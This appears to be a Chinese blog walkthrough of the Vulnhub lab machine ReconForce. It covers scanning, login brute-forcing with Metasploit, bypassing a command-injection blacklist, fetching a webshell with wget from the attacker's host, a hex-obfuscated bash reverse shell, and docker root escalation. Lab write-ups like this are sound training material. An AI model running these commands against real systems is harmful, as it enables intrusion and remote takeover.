前言

Vulnhub刷题简单记录

ReconForce

描述
良好的枚举技巧

难度：容易中级

Flag: 2 标记第一个用户和第二个根用户

学习：Web 应用程序 | 枚举 | 权限提升

ReconForce开始

1、可以用两种方法确认靶场的存在，扫ip

netdiscover -i eth0 -r 192.168.56.0/24
nmap -sn 192.168.56.0/24

2、扫目标端口开发情况

nmap -sV -sC 192.168.56.108 -oA R
./nmapAutomator.sh -H 192.168.56.108 -t recon

3、访问主页，爆破目录，指定扫描php

gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php

dirb http://192.168.56.108/

dirsearch http://192.168.56.108/ -e* -x 403 -r

4、没有扫出什么，登陆ftp端口发现有用户Security@hackNos

5、在登陆页面尝试爆破，用收集来的信息

word=["Recon","Security","hackNos","5ecure"]
for i in word:
    print(i+"@hackNos")

输出

Recon@hackNos
Security@hackNos
hackNos@hackNos
5ecure@hackNos

练习一下msf的auth验证模块爆破登陆

use auxiliary/scanner/http/http_login
options
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS YES
options
set PASS_FILE /root/BC/R/pass
options
set rhosts 192.168.56.108

接着登陆利用||的特性来进行命令执行（特性是前面的命令执行失败，再执行后面的命令）

明显命令执行漏洞，接着用wget上传木马

这是cat查看的过滤规则，所以正常的反弹会失败

// Set blacklist
$substitutions = array(
    '&'  => '',
    ';'  => '',
    '| ' => '',
    '-'  => '',
    '$'  => '',
    '('  => '',
    ')'  => '',
    '`'  => '',
    '||' => '',
);

给他上传一个一句话木马

|| wget http://192.168.56.1:8000/shell.php

接着反弹shell，骚姿势

echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631" |xxd -r -p|bash

拿到shell之后，为了防止乱码，可以使用ctrl+Z，然后再使用下面命令

stty raw -echo
nc -lvvp 1234 #返回终端

查看etc/passwd,发现有两个bash用户

还有一个recon，可以试试刚刚登陆的密码，或者爆破一下，发现可以登录

接着发现recon用户可以直接提权

方法二

docker提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker images
docker run -it -v /:/mbt ae7952123bc6  #加载这台主机的根目录

我的个人博客

孤桜懶契：http://gylq.gitee.io

Run

【Vulnhub】靶机ReconForce

前言

ReconForce

描述

ReconForce开始

方法二

我的个人博客

孤桜懶契：http://gylq.gitee.io